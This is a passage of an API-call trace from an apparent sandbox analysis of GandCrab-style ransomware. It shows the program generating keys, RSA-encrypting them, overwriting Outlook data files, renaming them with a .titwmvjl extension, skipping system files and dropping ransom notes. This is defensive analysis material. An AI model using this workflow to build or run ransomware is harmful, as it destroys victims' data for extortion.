VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.881] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.882] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0072.882] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.883] ReadFile (in: hFile=0x2c4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0072.884] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.884] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.884] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0072.884] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0072.885] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0072.885] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0072.885] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0072.885] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.885] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.885] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.885] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.885] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0072.886] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0072.886] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0072.886] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0072.886] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0072.886] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.886] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.886] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.886] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.887] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0072.887] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.887] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503538) returned 1 [0072.887] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.888] CryptGetKeyParam (in: hKey=0x503538, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0072.888] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.888] CryptEncrypt (in: hKey=0x503538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0072.888] GetLastError () returned 0x0 [0072.888] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.888] CryptDestroyKey (hKey=0x503538) returned 1 [0072.888] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.888] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.888] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.888] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0072.889] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.889] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503738) returned 1 [0072.889] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.889] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0072.889] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.889] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0072.890] GetLastError () returned 0x0 [0072.890] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.890] CryptDestroyKey (hKey=0x503738) returned 1 [0072.890] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.890] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.890] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0072.890] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0072.890] ReadFile (in: hFile=0x2c4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ecb4*=0xa00, lpOverlapped=0x0) returned 1 [0072.897] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffff600, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.897] WriteFile (in: hFile=0x2c4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ec98*=0xa00, lpOverlapped=0x0) returned 1 [0072.898] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.899] WriteFile (in: hFile=0x2c4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0072.900] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.904] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.904] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.904] CloseHandle (hObject=0x2c4) returned 1 [0072.906] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\outlook\\outlook.srs.titwmvjl"), dwFlags=0x1) returned 1 [0072.906] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.906] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.906] lstrcmpW (lpString1="Outlook.xml", lpString2=".") returned 1 [0072.906] lstrcmpW (lpString1="Outlook.xml", lpString2="..") returned 1 [0072.907] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2="Outlook.xml" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" [0072.907] lstrlenW (lpString=".titwmvjl") returned 9 [0072.907] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 67 [0072.907] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.907] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.titwmvjl") returned 76 [0072.907] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 67 [0072.907] lstrlenW (lpString=".xml") returned 4 [0072.907] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.907] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".xml ") returned 5 [0072.907] lstrcmpiW (lpString1=".xml", lpString2=".titwmvjl") returned 1 [0072.907] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.907] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 67 [0072.907] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 67 [0072.907] lstrcmpiW (lpString1="Outlook.xml", lpString2="desktop.ini") returned 1 [0072.907] lstrcmpiW (lpString1="Outlook.xml", lpString2="autorun.inf") returned 1 [0072.907] lstrcmpiW (lpString1="Outlook.xml", lpString2="ntuser.dat") returned 1 [0072.907] lstrcmpiW (lpString1="Outlook.xml", lpString2="iconcache.db") returned 1 [0072.907] lstrcmpiW (lpString1="Outlook.xml", lpString2="bootsect.bak") returned 1 [0072.907] lstrcmpiW (lpString1="Outlook.xml", lpString2="boot.ini") returned 1 [0072.908] lstrcmpiW (lpString1="Outlook.xml", lpString2="ntuser.dat.log") returned 1 [0072.908] lstrcmpiW (lpString1="Outlook.xml", lpString2="thumbs.db") returned -1 [0072.908] lstrcmpiW (lpString1="Outlook.xml", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0072.908] lstrcmpiW (lpString1="Outlook.xml", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0072.908] lstrcmpiW (lpString1="Outlook.xml", lpString2="KRAB-DECRYPT.html") returned 1 [0072.908] lstrcmpiW (lpString1="Outlook.xml", lpString2="CRAB-DECRYPT.html") returned 1 [0072.908] lstrcmpiW (lpString1="Outlook.xml", lpString2="KRAB-DECRYPT.txt") returned 1 [0072.908] lstrcmpiW (lpString1="Outlook.xml", lpString2="CRAB-DECRYPT.txt") returned 1 [0072.908] lstrcmpiW (lpString1="Outlook.xml", lpString2="ntldr") returned 1 [0072.908] lstrcmpiW (lpString1="Outlook.xml", lpString2="NTDETECT.COM") returned 1 [0072.908] lstrcmpiW (lpString1="Outlook.xml", lpString2="Bootfont.bin") returned 1 [0072.908] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 67 [0072.908] lstrlenW (lpString=".xml") returned 4 [0072.908] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.908] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".xml ") returned 5 [0072.908] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.908] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.908] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0072.909] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.910] ReadFile (in: hFile=0x2c4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0072.922] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.923] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.923] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0072.923] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0072.924] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0072.924] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0072.924] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0072.924] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.924] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.924] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.924] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.924] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0072.925] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0072.925] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0072.925] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0072.925] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0072.925] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.925] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.926] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.926] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0072.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.926] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503338) returned 1 [0072.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.927] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0072.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.927] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0072.927] GetLastError () returned 0x0 [0072.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.927] CryptDestroyKey (hKey=0x503338) returned 1 [0072.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.927] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.928] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0072.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.928] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5034b8) returned 1 [0072.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.928] CryptGetKeyParam (in: hKey=0x5034b8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0072.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.928] CryptEncrypt (in: hKey=0x5034b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0072.929] GetLastError () returned 0x0 [0072.929] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.929] CryptDestroyKey (hKey=0x5034b8) returned 1 [0072.929] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.929] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.929] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0072.929] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0072.929] ReadFile (in: hFile=0x2c4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ecb4*=0x956, lpOverlapped=0x0) returned 1 [0072.935] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffff6aa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.935] WriteFile (in: hFile=0x2c4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x956, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ec98*=0x956, lpOverlapped=0x0) returned 1 [0072.936] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.936] WriteFile (in: hFile=0x2c4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0072.938] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.941] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.941] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.942] CloseHandle (hObject=0x2c4) returned 1 [0072.943] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\outlook\\outlook.xml.titwmvjl"), dwFlags=0x1) returned 1 [0072.943] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.943] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.943] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.944] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.944] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\TITWMVJL-DECRYPT.txt" [0072.944] lstrlenW (lpString=".titwmvjl") returned 9 [0072.944] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\TITWMVJL-DECRYPT.txt") returned 76 [0072.944] VirtualAlloc (lpAddress=0x0, dwSize=0xd8, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.944] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 85 [0072.944] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\TITWMVJL-DECRYPT.txt") returned 76 [0072.944] lstrlenW (lpString=".txt") returned 4 [0072.944] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.944] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.944] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.944] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.944] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\TITWMVJL-DECRYPT.txt") returned 76 [0072.944] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\TITWMVJL-DECRYPT.txt") returned 76 [0072.944] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.944] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.944] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.944] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.944] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.944] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.944] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.945] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.945] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.945] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0072.945] FindClose (in: hFindFile=0x5034f8 | out: hFindFile=0x5034f8) returned 1 [0072.945] CloseHandle (hObject=0x2bc) returned 1 [0072.946] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0072.946] lstrcmpW (lpString1="PowerPoint", lpString2=".") returned 1 [0072.946] lstrcmpW (lpString1="PowerPoint", lpString2="..") returned 1 [0072.946] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="PowerPoint" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint" [0072.946] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\" [0072.946] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.946] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.946] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.946] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.946] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.947] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.947] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.947] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.947] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.947] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.947] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.947] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\\\TITWMVJL-DECRYPT.txt") returned 80 [0072.947] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\powerpoint\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0072.948] lstrlenW 